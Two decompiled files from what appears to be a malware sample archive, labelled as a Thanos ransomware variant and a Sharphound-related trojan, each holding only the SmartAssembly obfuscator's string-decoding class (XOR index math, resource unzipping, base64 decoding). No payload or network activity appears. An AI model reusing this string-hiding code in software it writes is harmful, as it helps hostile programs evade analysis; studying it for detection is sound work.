File: HEUR-Trojan-Ransom/MSIL/T/HEUR-Trojan-Ransom.MSIL.Thanos.gen-d29abe6ed086a5508c54df31010c36cc19fea3bdc5d521ee7c0d7063a51bb131/chaddad/SmartAssembly/StringsEncoding/Strings.vb
Imports System
Imports System.Collections.Generic
Imports System.IO
Imports System.Reflection
Imports System.Text
Imports SmartAssembly.Zip

Namespace SmartAssembly.StringsEncoding
	' Token: 0x02000033 RID: 51
	Public NotInheritable Class Strings
		' Token: 0x060000EF RID: 239 RVA: 0x00002C4F File Offset: 0x00000E4F
		Public Shared Function [Get](int_0 As Integer) As String
			int_0 = int_0 Xor 107396847
			int_0 -= Strings.offset
			If Not Strings.cacheStrings Then
				Return Strings.GetFromResource(int_0)
			End If
			Return Strings.GetCachedOrResource(int_0)
		End Function

		' Token: 0x060000F0 RID: 240 RVA: 0x0000FB30 File Offset: 0x0000DD30
		Public Shared Function GetCachedOrResource(int_0 As Integer) As String
			Dim obj As Object = Strings.hashtableLock
			SyncLock obj
				Dim text As String
				Strings.hashtable.TryGetValue(int_0, text)
				If text IsNot Nothing Then
					Return text
				End If
			End SyncLock
			Return Strings.GetFromResource(int_0)
		End Function

		' Token: 0x060000F1 RID: 241 RVA: 0x0000FB80 File Offset: 0x0000DD80
		Public Shared Function GetFromResource(int_0 As Integer) As String
			Dim array As Byte() = Strings.bytes
			Dim num As Integer = int_0 + 1
			Dim num2 As Integer = array(int_0)
			Dim num3 As Integer
			If(num2 And 128) = 0 Then
				num3 = num2
				If num3 = 0 Then
					Return String.Empty
				End If
			ElseIf(num2 And 64) = 0 Then
				Dim num4 As Integer = (num2 And 63) << 8
				Dim array2 As Byte() = Strings.bytes
				Dim num5 As Integer = num
				num = num5 + 1
				num3 = num4 + array2(num5)
			Else
				Dim num6 As Integer = (num2 And 31) << 24
				Dim array3 As Byte() = Strings.bytes
				Dim num7 As Integer = num
				num = num7 + 1
				Dim num8 As Integer = num6 + (array3(num7) << 16)
				Dim array4 As Byte() = Strings.bytes
				Dim num9 As Integer = num
				num = num9 + 1
				Dim num10 As Integer = num8 + (array4(num9) << 8)
				Dim array5 As Byte() = Strings.bytes
				Dim num11 As Integer = num
				num = num11 + 1
				num3 = num10 + array5(num11)
			End If
			Dim text2 As String
			Try
				Dim array6 As Byte() = Convert.FromBase64String(Encoding.UTF8.GetString(Strings.bytes, num, num3))
				Dim text As String = String.Intern(Encoding.UTF8.GetString(array6, 0, array6.Length))
				If Strings.cacheStrings Then
					Strings.CacheString(int_0, text)
				End If
				text2 = text
			Catch
				text2 = Nothing
			End Try
			Return text2
		End Function

		' Token: 0x060000F2 RID: 242 RVA: 0x0000FC58 File Offset: 0x0000DE58
		Public Shared Sub CacheString(int_0 As Integer, string_0 As String)
			Try
				Dim obj As Object = Strings.hashtableLock
				SyncLock obj
					Strings.hashtable.Add(int_0, string_0)
				End SyncLock
			Catch
			End Try
		End Sub

		' Token: 0x060000F3 RID: 243 RVA: 0x0000FCA8 File Offset: 0x0000DEA8
		Shared Sub New()
			If Strings.MustUseCache = "1" Then
				Strings.cacheStrings = True
				Strings.hashtable = New Dictionary(Of Integer, String)()
			End If
			Strings.offset = Convert.ToInt32(Strings.OffsetValue)
			Using manifestResourceStream As Stream = Assembly.GetExecutingAssembly().GetManifestResourceStream("{4b195894-0f06-4fdd-afb4-b17fb9246a59}")
				Dim num As Integer = Convert.ToInt32(manifestResourceStream.Length)
				Dim array As Byte() = New Byte(num - 1) {}
				manifestResourceStream.Read(array, 0, num)
				Strings.bytes = SimpleZip.Unzip(array)
			End Using
		End Sub

		' Token: 0x040000D5 RID: 213
		Private Shared MustUseCache As String = "1"

		' Token: 0x040000D6 RID: 214
		Private Shared OffsetValue As String = "101"

		' Token: 0x040000D7 RID: 215
		Private Shared bytes As Byte() = Nothing

		' Token: 0x040000D8 RID: 216
		Private Shared hashtable As Dictionary(Of Integer, String)

		' Token: 0x040000D9 RID: 217
		Private Shared hashtableLock As Object = New Object()

		' Token: 0x040000DA RID: 218
		Private Shared cacheStrings As Boolean = False

		' Token: 0x040000DB RID: 219
		Private Shared offset As Integer = 0
	End Class
End Namespace

File: Trojan/Win32/S/Trojan.Win32.Sharphound.gen-48fd24f7b1adc1437900712d81d5a9d834eca0a6a1e78aad8714f80972d3c1c8/SmartAssembly.StringsEncoding/Strings.cs
using System;
using System.Collections.Generic;
using System.IO;
using System.Reflection;
using System.Text;

namespace SmartAssembly.StringsEncoding;

public class Strings
{
	public static class DynProx
	{
		public static string Get(int stringID)
		{
			stringID ^= 0x666BEEF;
			stringID -= offset;
			if (!cacheStrings)
			{
				return GetFromResource(stringID);
			}
			return GetCachedOrResource(stringID);
		}
	}

	private static readonly string MustUseCache;

	private static readonly string OffsetValue;

	private static readonly byte[] bytes;

	private static readonly Dictionary<int, string> hashtable;

	private static readonly object hashtableLock;

	private static readonly bool cacheStrings;

	private static readonly int offset;

	public static string Get(int stringID)
	{
		return DynProx.Get(stringID);
	}

	public static string GetCachedOrResource(int stringID)
	{
		lock (hashtableLock)
		{
			hashtable.TryGetValue(stringID, out var value);
			if (value != null)
			{
				return value;
			}
		}
		return GetFromResource(stringID);
	}

	public static string GetFromResource(int stringID)
	{
		int index = stringID;
		int num = bytes[index++];
		int num2;
		if (((uint)num & 0x80u) != 0)
		{
			num2 = ((((uint)num & 0x40u) != 0) ? (((num & 0x1F) << 24) + (bytes[index++] << 16) + (bytes[index++] << 8) + bytes[index++]) : (((num & 0x3F) << 8) + bytes[index++]));
		}
		else
		{
			num2 = num;
			if (num2 == 0)
			{
				return string.Empty;
			}
		}
		try
		{
			byte[] array = Convert.FromBase64String(Encoding.UTF8.GetString(bytes, index, num2));
			string text = string.Intern(Encoding.UTF8.GetString(array, 0, array.Length));
			if (cacheStrings)
			{
				CacheString(stringID, text);
			}
			return text;
		}
		catch
		{
			return null;
		}
	}

	public static void CacheString(int stringID, string value)
	{
		try
		{
			lock (hashtableLock)
			{
				hashtable.Add(stringID, value);
			}
		}
		catch
		{
		}
	}

	static Strings()
	{
		MustUseCache = "0";
		OffsetValue = "143";
		bytes = null;
		hashtableLock = new object();
		cacheStrings = false;
		offset = 0;
		if (MustUseCache == "1")
		{
			cacheStrings = true;
			hashtable = new Dictionary<int, string>();
		}
		offset = Convert.ToInt32(OffsetValue);
		using Stream stream = Assembly.GetExecutingAssembly().GetManifestResourceStream("{886c8846-a2c5-4fea-86fc-ac483bdbcc12}");
		int num = Convert.ToInt32(stream.Length);
		bytes = new byte[num];
		stream.Read(bytes, 0, num);
	}
}
